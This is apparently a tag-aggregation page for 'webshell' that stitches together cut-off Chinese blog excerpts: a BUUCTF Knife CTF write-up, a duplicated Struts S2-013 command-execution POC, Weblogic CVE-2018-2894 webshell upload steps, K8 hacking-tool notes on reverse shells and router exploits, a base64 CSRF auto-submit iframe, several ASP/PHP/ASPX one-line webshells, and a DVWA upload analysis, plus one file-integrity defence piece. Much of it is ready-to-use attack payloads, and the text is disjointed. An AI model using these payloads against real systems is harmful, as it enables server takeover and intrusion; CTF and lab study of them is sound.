webshell

CTF-Web-[极客大挑战 2019]Knife 博客说明 文章所涉及的资料来自互联网整理和个人总结，意在于个人学习和经验汇总，如有什么地方侵权，请联系本人删除，谢谢！本文仅用于学习与交流，不得用于非法用途！ CTP平台 网址 https://buuoj.cn/challenges 题目 Web类，[极客大挑战 2019]Knife 打开题目的实例 思路 看到这种题目，首先到处点一点，看看有什么奇怪的地方，然后打开源代码，差不多就是这样，然后一顿操作没有怎么发现，反而eval($_POST["Syc"])这一段比较明显，是作为后门用post提交一个字符串Syc，刚好结合名字Knife，想起了一个东西--中国菜刀 中国菜刀 下载地址 http://xiazai.zol.com.cn/detail/44/438518.shtml 中国菜刀是一款专业的网站管理软件，用途广泛，使用方便，小巧实用。只要支持动态脚本的网站，都可以用中国菜刀来进行管理 一般针对于一句话木马 一句话木马 短小精悍，而且功能强大，隐蔽性非常好，在入侵中始终扮演着强大的作用。 常用一句话木马如下： asp一句话木马： 　　 <%execute(request("value"))%> php一句话木马： 　　 <?php @eval($_POST[value]);?> 当然我的是mac，安装不了菜刀

Struts漏洞合集 Struts-S2-013漏洞利用 受影响版本 Struts 2.0.0 - Struts 2.3.14.1 漏洞利用 任意命令执行POC： ${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('id').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#out.println(#d),#out.close())} 或着 ${#_memberAccess["allowStaticMethodAccess"]=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())} 如： http://your-ip:8080/link.action?a=%24%7B

Struts漏洞合集 Struts-S2-013漏洞利用 受影响版本 Struts 2.0.0 - Struts 2.3.14.1 漏洞利用 任意命令执行POC： ${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('id').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#out.println(#d),#out.close())} 或着 ${#_memberAccess["allowStaticMethodAccess"]=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())} 如： http://your-ip:8080/link.action?a=%24%7B

Weblogic漏洞 Weblogic任意文件上传（CVE-2018-2894） 受影响版本 weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2、weblogic 12.2.1.3。 漏洞存在前提 后台base_domain设置中启用web服务测试页 利用漏洞方法 访问 http://xxx.com/ws_utc/config.do 设置Work Home Dir为 /u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css 将目录设置为ws_utc应用的静态文件css目录，访问这个目录是无需权限的，然后提交。 点击"安全"，添加，弹出登录框，点击“浏览”上传webshell并抓包 找到响应包中的时间戳 访问http://xxx.com/ws_utc/css/config/keystore/[时间戳]_[文件名]，即可执行webshell Weblogic反序列化 (CVE-2017-10271) 受影响版本 10.3.6.0.0，12.1.3.0.0，12.2.1.1.0，12.2.1.2.0

试想一下，如果你的网站被入侵，攻击者留下隐藏的后门，你真的都可以找出来嘛？面对一个大中型的应用系统，数以百万级的代码行，是不可能做到每个文件每段代码进行手工检查的。 即使是一款拥有99.9%的Webshell检出率的检测引擎，依然可能存在Webshell绕过的情况。 另外，像暗链、网页劫持、页面跳转等常见的黑帽SEO手法，也很难通过手动检测或工具检测全部识别出来。 最好的方式就是做文件完整性验证。 通过与原始代码对比，可以快速发现文件是否被篡改以及被篡改的位置。当然，第一个前提是，你所在的团队已具备代码版本管理的能力，如果你是个人站长，相信你已经备份了原始代码。 本文将结合实际应用，介绍几种文件完整性验证方式，可以帮助你找出代码中所有隐藏的后门。 1、文件MD5校验 当下载D盾_Web查杀工具的时候，我们可以留意到下载的压缩包里，除了有一个 exe 可执行文件，还有一个文件 md5 值。这个是软件作者在发布软件时，通过 md5 算法计算出该 exe 文件的“特征值”。 下载地址：http://www.d99net.net/down/WebShellKill_V2.0.9.zip文件MD5：29285decadbce3918a4f8429ec33df46 WebShellKill.exe 当用户下载软件时，可以使用相同的校验算法计算下载到 exe 文件的特征值

工具: K8飞刀 编译: 自己查壳 组织: K8搞基大队[K8team] 作者: K8拉登哥哥 博客: http://qqhack8.blog.163.com 发布: 2015/7/20 3:00:18 简介: K8飞刀是一款多功能的渗透测试工具. Hacker Swiss Army Knife. 内置大量漏洞EXP/GetShell/0day网马/U盘自动种马/脱库采集工具 支持7种WebShell管理/后台扫描/2级域名扫描/WordPress用户扫描 黑客浏览器/自动检测注入/自动收集信息/Exp调式/可一键生成EXP 多种编码转换/一键CSRF构造/Cookie一键登陆/XSS编码/SQL提权等 图片: 新增shellcode Loader 用msf生成一段反弹shellcode,点击Loader测试 bt5 这边成功反弹shell 说明shellcode没问题 就可以把shellcode拿去实战使用了 比如ht的flash 0day等 功能: K8飞刀 20150720 ShellCode Loader [+]EncodeDecode Hacking--ShellCode--ShellCode Loader 20150720 [+]EncodeDecode Hacking--ShellCode--HexString2CharArray 20150720 [+

工具: K8飞刀 编译: 自己查壳 组织: K8搞基大队[K8team] 作者: K8拉登哥哥 博客: http://qqhack8.blog.163.com 发布: 2015/7/26 3:41:11 简介: K8飞刀是一款多功能的渗透测试工具. Hacker Swiss Army Knife. 内置大量漏洞EXP/GetShell/0day网马/U盘自动种马/脱库采集工具 支持7种WebShell管理/后台扫描/2级域名扫描/WordPress用户扫描 黑客浏览器/自动检测注入/自动收集信息/Exp调式/可一键生成EXP 多种编码转换/一键CSRF构造/Cookie一键登陆/XSS编码/SQL提权等 图片: 设置Socks5代理后,使用HackerIE的Hack模式,访问攻击内网路由器或web站点 当然也可以获取肉鸡上的Cookie使用CookieHack直接登陆内网站点管理后台 最重要的是可以使用飞刀里的大量漏洞对内网WEB程序或路由器进行攻击了 功能: K8飞刀 20150725 [u]检测更新 不再强制跳转URL,允许用户选择是否更新 20150725 [+]Exploit-DB 腾达无线路由器(Tenda 11N)登陆密码绕过 20150724 [+]SysSeting 支持SOCKS5代理设置(配合Htran内网渗透) 20150723 [+]WebShell

转自wang师傅博客 地址:https://blog.51cto.com/0x007/1610946 1.Refere为空条件下 解决方案: 利用 ftp://,http://,https://,file://,javascript:,data: 这个时候浏览器地址栏是file://开头的，如果这个HTML页面向任何http站点提交请求的话，这些请求的Referer都是空的。 例: 利用data:协议 <html> <body> <iframe src="data:text/html;base64,PGZvcm0gbWV0aG9kPXBvc3QgYWN0aW9uPWh0dHA6Ly9hLmIuY29tL2Q+PGlucHV0IHR5cGU9dGV4dCBuYW1lPSdpZCcgdmFsdWU9JzEyMycvPjwvZm9ybT48c2NyaXB0PmRvY3VtZW50LmZvcm1zWzBdLnN1Ym1pdCgpOzwvc2NyaXB0Pg=="> </body> </html> bese64编码 解码即可看到代码 利用https协议 https向http跳转的时候Referer为空 拿一个https的webshell <iframe src="https://xxxxx.xxxxx/attack.php"> attack.php写上CSRF攻击代码 2

大纲：webshell制作与原理 　　　webshell使用技巧 　　　webshell“黑吃黑” webshell制作原理 　　 webshell种类 　　　　一句话木马（使用的最多）、小马、大马、打包马、脱裤马、、、 　　 一句话木马 　　　　介绍：短小精悍，并且功能强大、隐蔽性非常好，在入侵种始终扮演着非常重要的角色 　　　　e.g：<%execute request("value")%> 　　　　解释： 　　　　execute：是一个执行函数，用来执行该命令 　　　　request：是接收提交方式，可接受post型、get型、cookie型的传参 　　　　value：是参数，也是我们用菜刀连接时的密码 　　　　http://www.xx.com/x.asp?value=　　以这种方式接收命令 　　　　用菜刀连接时如下： 　　　　 　　 常见写法： 　　　　asp一句话： 　　　　<%eval request("pv")%> 　　　　PHP一句话： 　　　　<?php eval($_POST[a])?> 　　　　aspx一句话： 　　　　<%@ Page Language="Jscript"%><%eval(Request.Item["mima"],"unsafe");%> 　　　　jsp一句话：（也是一种小马） 　　　　 　　 一句话木马的变形（为了绕过waf） 　　　　<

一句话木马 <?php @eval($_POST['key']); ?> /*eval( phpcode) eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码，且必须以分号结尾。*/ 通常是由于对上传文件的类型、内容没有进行严格的过滤、检查，使得攻击者可以通过上传木马获取服务器的webshell权限，因此文件上传漏洞带来的危害常常是毁灭性的，Apache、Tomcat、Nginx等都曝出过文件上传漏洞。 Low basename(path,suffix) 函数返回路径中的文件名部分，如果可选参数suffix为空，则返回的文件名包含后缀名，反之不包含后缀名。 我们看到服务器对上传的文件类型、内容或是文件大小都没有做任何的检查、过滤，存在明显的文件上传漏洞，生成上传路径后，服务器会检查是否上传成功并返回相应提示信息。 这段代码的核心就是验证是否有接收文件（$_POST[‘Upload’]） $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; DVWA_WEB_PAGE_TO_ROOT=E:\phpStudy2019_64\phpstudy_pro\WWW\DVWA $target_path=E:\phpStudy2019_64\phpstudy_pro\WWW\DVWA